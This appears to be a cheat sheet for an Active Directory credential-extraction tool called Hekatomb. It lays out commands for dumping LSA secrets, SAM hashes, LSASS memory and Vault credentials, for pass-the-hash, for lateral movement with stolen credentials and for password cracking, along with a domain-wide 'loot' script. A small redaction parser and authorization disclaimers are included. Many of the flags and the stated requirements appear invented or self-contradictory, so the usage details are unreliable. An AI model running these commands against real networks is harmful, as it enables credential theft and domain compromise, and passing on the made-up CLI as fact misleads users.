Hekatomb is a specialized security testing tool designed to extract and decrypt credentials stored via Windows DPAPI (Data Protection API) on Active Directory systems. It’s used by authorized penetration testers and red teamers to assess the security of credential storage mechanisms in Windows environments. Hekatomb can recover credentials, perform lateral movement testing, and identify credential exposure risks.
This tool is strictly for authorized penetration testing, security assessments, and authorized red team operations on systems you own or have explicit written permission to test. Unauthorized credential extraction is illegal.
Generic install:

```bash
# Download from GitHub releases, or clone the repository
git clone https://github.com/Tw1sm/hekatomb.git
cd hekatomb
# Requirements: Python 3.7+
pip install -r requirements.txt
```

Debian/Ubuntu:

```bash
sudo apt-get install git python3 python3-pip
git clone https://github.com/Tw1sm/hekatomb.git
cd hekatomb
pip3 install -r requirements.txt
```

macOS (Homebrew):

```bash
brew install python3 git
git clone https://github.com/Tw1sm/hekatomb.git
cd hekatomb
pip3 install -r requirements.txt
```

Verify the install:

```bash
python3 hekatomb.py --help
python3 hekatomb.py --version
```
| Requirement | Details |
|---|---|
| OS | Windows with DPAPI or AD integration |
| Privileges | Administrator or SYSTEM context |
| Network Access | Domain controller access for AD operations |
| Python | 3.7+ on attacking machine (Linux/macOS) |
| Impacket | Required for AD operations |
```bash
# Domain admin credentials for full functionality
# Or local admin on target system
# Format for credential specification:
#   domain/username:password
#   username@domain:password
```
| Command | Description |
|---|---|
| `python3 hekatomb.py -t target.example.com` | Extract from domain target |
| `python3 hekatomb.py -u user -p pass target.com` | Specify credentials |
| `python3 hekatomb.py -target IP -domain DOMAIN` | IP-based with domain |
| `python3 hekatomb.py --help` | Display help menu |
```bash
# Basic extraction from domain
python3 hekatomb.py -t dc.example.com
# With explicit credentials
python3 hekatomb.py -u administrator -p MyP@ssw0rd! -t dc.example.com
# Domain specification
python3 hekatomb.py -u CORP\\administrator -p password -t 192.168.1.10
# Hash-based (pass-the-hash)
python3 hekatomb.py -u administrator -H aabbccdd... -t dc.example.com
```
| Command | Description |
|---|---|
| `hekatomb -t target -method dpapi` | Decrypt DPAPI protected data |
| `hekatomb -t target -local` | Extract local user credentials |
| `hekatomb -t target -cached` | Extract cached logon credentials |
| `hekatomb -t target -vault` | Extract Windows Vault credentials |
```bash
# Extract all DPAPI-protected credentials
python3 hekatomb.py -t dc.example.com -method dpapi
# Local user extraction
python3 hekatomb.py -t workstation.local -local
# Cached credentials
python3 hekatomb.py -t pc01.example.com -cached
# Vault credentials (RDP, etc.)
python3 hekatomb.py -t target.com -vault
```
| Command | Description |
|---|---|
| `hekatomb -t DC -domain DOMAIN -u admin -p pass` | Full domain extraction |
| `hekatomb -t DC -domain DOMAIN -users` | Extract user credentials |
| `hekatomb -t DC -domain DOMAIN -computers` | Extract computer accounts |
| `hekatomb -t DC -loot` | Collect all available credentials |
```bash
# Full domain credential extraction
python3 hekatomb.py -t 10.0.0.1 -domain CORP -u admin -p MyPassword123
# User-only extraction
python3 hekatomb.py -t dc.corp.local -domain CORP -users -u CORP\\admin -p pass
# Computer account extraction
python3 hekatomb.py -t dc.example.com -computers -u administrator -p password
# Comprehensive looting
python3 hekatomb.py -t primary-dc -domain COMPANY -u admin -p pass -loot
```
| Target | Description |
|---|---|
| LSA Secrets | Stored system credentials |
| SAM Database | Local user password hashes |
| LSASS Memory | Active session credentials |
| Windows Vault | Stored website/service credentials |
| Cached Logons | Offline domain logon cache |
| RDP Credentials | Remote desktop connection data |
```bash
# Extract LSA secrets
python3 hekatomb.py -t target -lsa
# SAM database
python3 hekatomb.py -t target -sam
# LSASS memory dump
python3 hekatomb.py -t target -lsass
# RDP cached credentials
python3 hekatomb.py -t target -rdp
# All credential types
python3 hekatomb.py -t target -all
```
| Flag | Description |
|---|---|
| `-o output.txt` | Save to text file |
| `-csv` | CSV format output |
| `-json` | JSON format output |
| `-v` | Verbose output with details |
```bash
# Save credentials to file
python3 hekatomb.py -t dc.example.com -o credentials.txt
# CSV export for analysis
python3 hekatomb.py -t dc.example.com -csv > extracted_creds.csv
# JSON format for integration
python3 hekatomb.py -t dc.example.com -json > creds.json
# Verbose logging
python3 hekatomb.py -t dc.example.com -v -o verbose_results.txt
```
Format varies by source:

LSA Secrets:

```text
[LSA_SECRET] Name: ServiceName | Value: credential_data
```

SAM Hashes:

```text
[SAM_HASH] Username: hash_value
```

Vault Credentials:

```text
[VAULT] Type: RDP | Username: user | Password: pass
```

Active Directory:

```text
[AD_USER] samAccountName | Password or Hash
```
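When the text output above has to go into a findings report, the secret values themselves should not travel with it. The following parser is an added example, not part of the Hekatomb project: it recognises the four record formats listed above, replaces each secret with a length hint, and counts records per type. The sample lines, the account names and the hash values in it are constructed.

```python
"""Added example: parse Hekatomb-style text output into redacted records.
Not part of the Hekatomb project; the record patterns follow the four
formats documented above, and the sample lines below are constructed."""
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample output: one line per documented record type plus a
# progress line that is not a credential record and must be skipped.
SAMPLE_OUTPUT = """\
[LSA_SECRET] Name: _SC_BackupSvc | Value: Winter2023!
[SAM_HASH] svc_backup: 0123456789abcdef0123456789abcdef
[VAULT] Type: RDP | Username: CORP\\jdoe | Password: Hunter2
[AD_USER] jdoe | 0123456789abcdef0123456789abcdef
[*] progress line that is not a credential record
"""

# One anchored pattern per bracketed tag; named groups give every record
# the same shape (name + secret, plus a subtype for vault entries).
PATTERNS = {
    "LSA_SECRET": re.compile(r"^\[LSA_SECRET\] Name: (?P<name>.+?) \| Value: (?P<secret>.*)$"),
    "SAM_HASH": re.compile(r"^\[SAM_HASH\] (?P<name>[^:]+): (?P<secret>\S+)$"),
    "VAULT": re.compile(
        r"^\[VAULT\] Type: (?P<subtype>[^|]+?) \| Username: (?P<name>[^|]+?) \| Password: (?P<secret>.*)$"
    ),
    "AD_USER": re.compile(r"^\[AD_USER\] (?P<name>[^|]+?) \| (?P<secret>.*)$"),
}


def redact(secret: str) -> str:
    """Replace a secret with a length hint: the finding stays provable,
    the value never reaches the report."""
    return f"<redacted, {len(secret)} chars>"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return a structured, redacted record for one output line,
    or None when the line matches none of the documented formats."""
    line = line.rstrip("\n")
    for rtype, pattern in PATTERNS.items():
        m = pattern.match(line)
        if m:
            rec = {
                "type": rtype,
                "name": m.group("name").strip(),
                "secret": redact(m.group("secret")),
            }
            if "subtype" in m.groupdict():
                rec["subtype"] = m.group("subtype").strip()
            return rec
    return None


def parse_output(text: str) -> List[Dict[str, str]]:
    """Parse a whole output dump, dropping non-record lines."""
    return [rec for rec in (parse_line(l) for l in text.splitlines()) if rec]


def summarize(records: List[Dict[str, str]]) -> Dict[str, int]:
    """Count records per type; this is what a findings table needs."""
    return dict(Counter(r["type"] for r in records))


if __name__ == "__main__":
    recs = parse_output(SAMPLE_OUTPUT)
    for r in recs:
        print(r)
    print(summarize(recs))
```

Feed real output through `parse_output` instead of copying the raw file into a report; the redacted records carry the account names and the per-type counts a remediation owner needs, while the unredacted file stays under the handling rules described later on this page.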
| Flag | Description |
|---|---|
| `-u username` | Specify username |
| `-p password` | Specify password |
| `-H hash` | NTLM hash (pass-the-hash) |
| `-k` | Kerberos authentication |
| `-aes key` | AES encryption key (impacket) |
```bash
# Standard credentials
python3 hekatomb.py -t dc.example.com -u DOMAIN\\admin -p password
# Pass-the-hash attack
python3 hekatomb.py -t dc.example.com -u administrator -H aabbccddeeff00112233445566778899
# Kerberos authentication
python3 hekatomb.py -t dc.example.com -k
# AES key authentication
python3 hekatomb.py -t dc.example.com -u admin -aes 0102030405060708090a0b0c0d0e0f10
```
| Command | Description |
|---|---|
| `hekatomb -t target -extract -lateral` | Extract for lateral movement |
| `hekatomb -t target -dump-all` | Complete credential dump |
| `hekatomb -t target -crack` | Attempt credential cracking |
```bash
# Extract credentials for lateral movement
python3 hekatomb.py -t compromised_workstation -lateral
# Dump all recoverable credentials
python3 hekatomb.py -t dc.example.com -dump-all
# Extract and crack weak passwords
python3 hekatomb.py -t target -crack -wordlist /usr/share/wordlists/rockyou.txt
```

```bash
# Extract from first compromised system
python3 hekatomb.py -t host1.example.com -o host1_creds.txt
# Use extracted credentials on next target
python3 hekatomb.py -t host2.example.com -u DOMAIN\\extracted_user -p extracted_password
# Continue lateral movement
python3 hekatomb.py -t host3.example.com -H extracted_hash
```
```bash
#!/bin/bash
# Comprehensive domain assessment
# Stop on the first failed step so a broken run does not report "complete"
set -euo pipefail

DOMAIN="EXAMPLE.COM"
DC="dc.example.com"
ADMIN="EXAMPLE\\administrator"
PASS="Password123!"

echo "[*] Starting Hekatomb Domain Assessment"
echo "[*] Target: $DOMAIN"

# Step 1: Extract user credentials
echo "[+] Extracting user credentials..."
python3 hekatomb.py -t "$DC" -u "$ADMIN" -p "$PASS" -users -o domain_users.txt

# Step 2: Extract computer accounts
echo "[+] Extracting computer accounts..."
python3 hekatomb.py -t "$DC" -u "$ADMIN" -p "$PASS" -computers -o domain_computers.txt

# Step 3: LSA secrets
echo "[+] Extracting LSA secrets..."
python3 hekatomb.py -t "$DC" -u "$ADMIN" -p "$PASS" -lsa -o lsa_secrets.txt

# Step 4: Complete loot
echo "[+] Comprehensive credential collection..."
python3 hekatomb.py -t "$DC" -u "$ADMIN" -p "$PASS" -loot -json -o complete_loot.json

echo "[+] Assessment complete"
```
```bash
# Create credential database
python3 hekatomb.py -t dc.example.com -u admin -p password -json > all_credentials.json
# Parse for analysis
jq '.credentials[] | {type: .type, username: .username}' all_credentials.json
# Count credential types
jq '.credentials[] | .type' all_credentials.json | sort | uniq -c
```
```bash
# Document authorization
cat > assessment_scope.txt << EOF
Hekatomb Security Assessment
Date: $(date)
Authorized Tester: [Name]
Target Domain: EXAMPLE.COM
Scope: All domain-joined systems
Purpose: Credential security assessment
Approval: [Manager Name/Signature]
EOF

# Begin assessment
python3 hekatomb.py -t dc.example.com -u authorized_admin -p approved_password -v | tee assessment_results.log
```
```bash
# Identify weak credential storage
python3 hekatomb.py -t dc.example.com -u admin -p pass -json > findings.json

# Generate report
cat > report.txt << EOF
Credential Storage Assessment Results
=====================================
1. DPAPI Vulnerability Analysis:
$(jq '.dpapi_findings[]' findings.json)
2. Cleartext Storage Issues:
$(jq '.cleartext_credentials[]' findings.json)
3. Weak Hash Detection:
$(jq '.weak_hashes[]' findings.json)
EOF
```
```bash
# Test domain connectivity (SMB and LDAP)
nmap -p 445,389 dc.example.com
# Verify credentials with Impacket's secretsdump script
secretsdump.py DOMAIN/user:pass@target
# Debug connection
python3 hekatomb.py -t dc.example.com -u admin -p pass -v
```
```bash
# Verify DPAPI access
python3 hekatomb.py -t target -test-dpapi
# Check Windows Vault availability
python3 hekatomb.py -t target -vault -v
# LSA Secrets access test
python3 hekatomb.py -t target -lsa -v
```

```bash
# If standard admin is insufficient, ensure SYSTEM context
# On a Linux attacking machine:
sudo python3 hekatomb.py -t target
# On Windows, run from an Administrator prompt:
python3 hekatomb.py -t target -u admin -p pass
```
- secretsdump - Impacket’s credential extraction
- mimikatz - Windows credential dumping (on-target)
- hashcat - Hash cracking
- responder - Network credential capturing
- crackmapexec - Post-exploitation automation
- bloodhound - AD enumeration and analysis
```bash
# Document all findings
python3 hekatomb.py -t dc.example.com -u admin -p pass -comprehensive-report

# Prepare remediation guidance
cat > remediation.txt << EOF
1. Update credential storage mechanisms
2. Implement DPAPI hardening
3. Enforce strong password policies
4. Monitor for suspicious credential access
5. Regular security assessments
EOF

# Securely dispose of credentials
shred -vfz -n 5 all_credentials.json
```
```bash
# Only test in authorized lab/production environments
# Ensure air-gapped network for sensitive assessment
# Document all activities with timestamps
# Maintain chain of custody for findings

# Secure credential handling
python3 hekatomb.py -t target -u admin -p pass > creds.txt
chmod 600 creds.txt
gpg -e -r security@company.com creds.txt
shred -vfz creds.txt
```